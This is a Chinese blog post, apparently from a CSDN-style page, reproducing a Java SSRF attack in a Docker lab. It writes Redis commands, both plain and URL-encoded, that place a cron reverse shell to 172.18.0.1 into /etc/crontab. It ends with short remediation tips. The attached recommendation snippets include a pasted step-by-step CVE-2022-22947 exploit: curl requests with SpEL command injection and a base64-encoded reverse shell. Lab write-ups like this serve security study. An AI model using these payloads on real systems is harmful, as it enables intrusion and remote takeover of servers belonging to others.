利用docker进行的SSRF in java的漏洞复现

最新推荐文章于 2025-04-17 09:11:19 发布
原创 最新推荐文章于 2025-04-17 09:11:19 发布 · 611 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

1、环境搭建

显示错误:Service 'redis' failed to build: The command '/bin/sh -c set -ex     && yum -y update     && yum -y install gcc-c++ tcl wget' returned a non-zero code: 

服务“redis”生成失败:

未安装redis服务器导致,

这里执行docker-compose up --build            //building redis

编写脚本扫描内网开放端口的主机

通过ssrf 探测到内网中redis服务器 ‘172.19.0.2:6379’正常访问
构造脚本写入 目录‘/etc/crontab‘

```
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
```

进行url编码:

```
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
```

反弹shell

2.        利用方式
网络请求支持的协议如下
http,https,file,ftp,mailto,jar,netdoc
对比php的ssrf,java这块利用相对局限,

3.        总结
以下几种类引用不当会造成SSRF
Request类,URL类的openStream,HttpClient类,URLConnection和HttpURLConnection类,
修复方案:
•        限制协议为HTTP、HTTPS
•        不用限制302重定向
•        设置URL白名单或者限制内网IP

参考链接:

SSRF漏洞(原理&绕过姿势)

对于Weblogic SSRF漏洞(CVE-2014-4210)

 

漏洞】Spring Cloud Data Flow - CVE-2024-37084 漏洞
渗透之路,攻防之间皆学问
10-15 1841
Spring Cloud Data Flow(SCDF)是一个基于微服务的工具包,用于在 Cloud Foundry 和 Kubernetes 中构建流式和批量数据处理管道。在受影响版本中Skipper 服务器在处理文件上传时没有对路径进行验证,拥有 Skipper 服务器 API 访问权限攻击者可以通过构造恶意请求将 YAML 文件写入服务器的任意位置,同时由于 PackageMetadata 的创建过程中使用默认构造器反序列化 YAML 数据,从而导致任意代码执行。
利用docker搭建漏洞环境,使用SSRF+Redis写入centos以及ubuntu的公钥,实免密登录
繁星
07-07 976
centos和ubuntu的步骤几乎相同,只是由于redis的保护机制,所以会有以下错误,导致部分属性无法修改,解决方法是将protected-mode关闭,使用以下命令;由于redis版本限制的问题,7.2.5的安全性过高,会导致ssh免密登录不成功,所以这里我拉取了5.0.5的版本接着利用同样的操作就可实免密登录;
ssrf漏洞 java反_SSRF漏洞分析与利用
weixin_35431719的博客
02-22 1532
前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的0x01 漏洞产生以curl为例,漏洞代码为ssrf.php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURL...
redis服务启动失败解决方法之一
yilvyangguang520的博客
10-14 1135
redis服务启动失败解决方法之一
DockerBuild报错:The command ‘/bin/sh -c yum install -y vim‘ returned a non-zero code: 1
weixin_53402685的博客
06-15 7250
dockerfile构建遇见的问题
ssrf漏洞之——漏洞
V_vevive的博客
08-25 961
6.发送三条redis命令,即可将弹shell的脚本写入/etc/crontab,之后将shell发送到指定的ip的一个端口,ip可自己更改,之后在192.168.16.131上使用nc监听4444端口,输入nc -lvvp 4444 开启监听。将url编码后的命令放到redis服务器的ip后(http://172.22.0.2:6379/命令),替换url发送,过一会nc处就会自动弹出一个控制172.22.0.2:6379的shell。将页面请求的url改为指定本地文件路径的url。
CVE-2019-12384 jackson ssrf-rce漏洞
ZJT6666666的博客
12-28 1162
CVE-2019-12384 jackson ssrf-rce漏洞
Zimbra SSRF+Memcached+反序列化漏洞利用
fnmsd的博客
04-12 9036
前言 之前懒了一下,没memcached反序列化的部分。 在看本文之前请先看完上一篇: https://blog.youkuaiyun.com/fnmsd/article/details/88657083 本篇基于8.7.11进行,就是官网上直接下的。 纯技术研究,请勿使用在非法用途。 环境搭建 直接用docker,https://hub.docker.com/r/jorgedlcruz/zi...
weblogic漏洞(一)
m0_67170526的博客
04-17 923
weblogic是是Oracle 公司开发的企业级 Java EE( Jakarta EE)应用服务器,主要用于部署和管理分布式、高可用的企业级应用。(个人感觉和tomcat差不多)
国光师傅的SSRF靶场docker环境.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发系统和应用的漏洞,并进行渗透测试,从而及时修和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
hadoop运行jar包出错误代码为127的解决方案_Exit code: 127
chenjie的博客
09-28 6480
今天在运行程序的时候新发的一个错误(Exit code: 127),下面提供解决方案,希望能帮助大家。下面是错误的信息: Job job_1601252515583_0001 failed with state FAILED due to: Application application_1601252515583_0001 failed 2 times due to AM Container for appattempt_1601252515583_0001_000002 exited with ex
yum install libreoffice‘ returned a non-zero
xu990128638的专栏
08-29 1028
【代码】yuminstalllibreoffice'returnedanon-zero。
docker+lnmp 报错小结,以laradock为例,其它同理
stone
04-19 9007
1、安装PHP扩展失败 用vagrant + centos7 + lnmp开发都快两年,这是一个很好用的本地开发环境。对于我来说,它更像是一台真正的linux电脑,能真正直接把握它的每一处地方。而且在内存都普遍8G以上的本子,加上SSD真的是毫无压力。 但时间一长,暴露出很多很烦人的东西: (1)只对本地有用,到了线上环境又是一堆恶心的依赖报错。当...
SSRF安全威胁在JAVA代码中的应用
angjiu8534的博客
05-26 860
如上图所示代码,在进行外部url调用的时候,引入了SSRF检测:ssrfChecker.checkUrlWithoutConnection(url)机制。 SSRF安全威胁: 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程...
centos7作为Docker基础镜像须知
乞力马扎罗的雪CYF的博客
04-07 5516
centos7基础镜像Dockerfile来构建mysql镜像可能会有问题,在Docker hub上构建失败:Build failed: The command '/bin/sh -c /etc/init.d/mysqld start && mysql -e "grant all privileges on *.* to 'root'@'%' identified by '1234...
linux安装gcc命令步骤(centos安装gcc命令)
sunsineq的专栏
01-14 7276
linux安装gcc命令步骤(centos安装gcc命令) >一、前言 本文介绍在CentOS7.8系统下使用YUM升级GCC版本的相关操作步骤。 CentOS7默认安装的gcc版本是4.8版本,gcc 4.8最主要的一个特性就是全面支持C++11,如果不清楚什么用的也没关系,简单说一些C++11标准的程序都需要gcc 4.8以上版本的gcc编译器编译。很多工具依赖的是更高版本的gcc,比如编译MySQL 8.0(8.0.16以上版本是C++14标准,需gcc 5.3以上版本)、Redis 6.
利用docker对cve-2022-22947漏洞
最新发布
06-27
<think>我们正在处理一个关于使用DockerCVE-2022-22947漏洞的请求。根据提供的引用信息,我们知道这是一个SpringCloudGatewayActuatorAPI的SpEL代码注入漏洞。用户希望得到详细的步骤。环境准备:1.确保系统已安装DockerDockerCompose。2.下载vulhub漏洞测试环境(包含CVE-2022-22947的环境)。步骤:步骤1:下载vulhub步骤2:进入对应的漏洞目录步骤3:启动漏洞环境步骤4:访问目标服务,确认环境启动成功步骤5:利用漏洞执行命令(例如:反弹shell或执行计算器)需要注意的是,漏洞应在授权环境下进行,且仅用于学习目的。我们将按照上述思路给出详细步骤。</think>### 使用 Docker CVE-2022-22947 漏洞的步骤 CVE-2022-22947 是 Spring Cloud Gateway 的 Actuator API 存在的 SpEL 表达式注入漏洞,攻击者可远程执行任意代码。以下是基于 Docker流程: --- #### **1. 环境准备** - **系统要求**:已安装 DockerDocker Compose - **下载漏洞环境**: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/spring/CVE-2022-22947 ``` --- #### **2. 启动漏洞环境** ```bash docker-compose up -d # 后台启动容器 ``` - 容器启动后,访问 `http://localhost:8080` 确认 Gateway 服务正常运行(显示 Whitelabel Error Page 即正常)[^1]。 --- #### **3. 漏洞利用(执行任意命令)** ##### **步骤 1:添加恶意路由** 发送 POST 请求创建包含恶意 SpEL 表达式的路由: ```bash curl -X POST http://localhost:8080/actuator/gateway/routes/hack \ -H "Content-Type: application/json" \ -d '{ "predicates": [{ "name": "Path", "args": {"_genkey_0":"/hack"} }], "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"whoami\").getInputStream()))}" } }], "uri": "http://example.com" }' ``` > **关键参数**: > - `value` 字段:注入 SpEL 表达式,此处执行 `whoami` 命令。 > - 替换 `exec(\"whoami\")` 可执行任意命令(如 `exec(\"touch /tmp/poc\")`)。 ##### **步骤 2:刷新路由使配置生效** ```bash curl -X POST http://localhost:8080/actuator/gateway/refresh ``` ##### **步骤 3:触发恶意路由** 访问路由路径触发命令执行: ```bash curl http://localhost:8080/hack ``` - **结果验证**:响应头中的 `Result` 字段将显示命令执行结果(如当前用户名为 `root`)。 --- #### **4. 反弹 Shell 示例** 将步骤 1 的 `value` 字段替换为反弹 Shell 命令: ```json "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}\").getInputStream()))}" ``` > 需将 `YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEwLzQ0NDQgMD4mMQ==` 替换为编码后的反弹 Shell 命令(使用 `base64` 编码)。 --- #### **5. 清理环境** ```bash docker-compose down # 停止并删除容器 ``` --- ### **漏洞原理** - **漏洞点**:`/actuator/gateway/routes` 端点未过滤用户输入,直接解析 SpEL 表达式。 - **利用条件**:需启用 Actuator API 且暴露 `gateway` 端点(默认不暴露)[^2]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值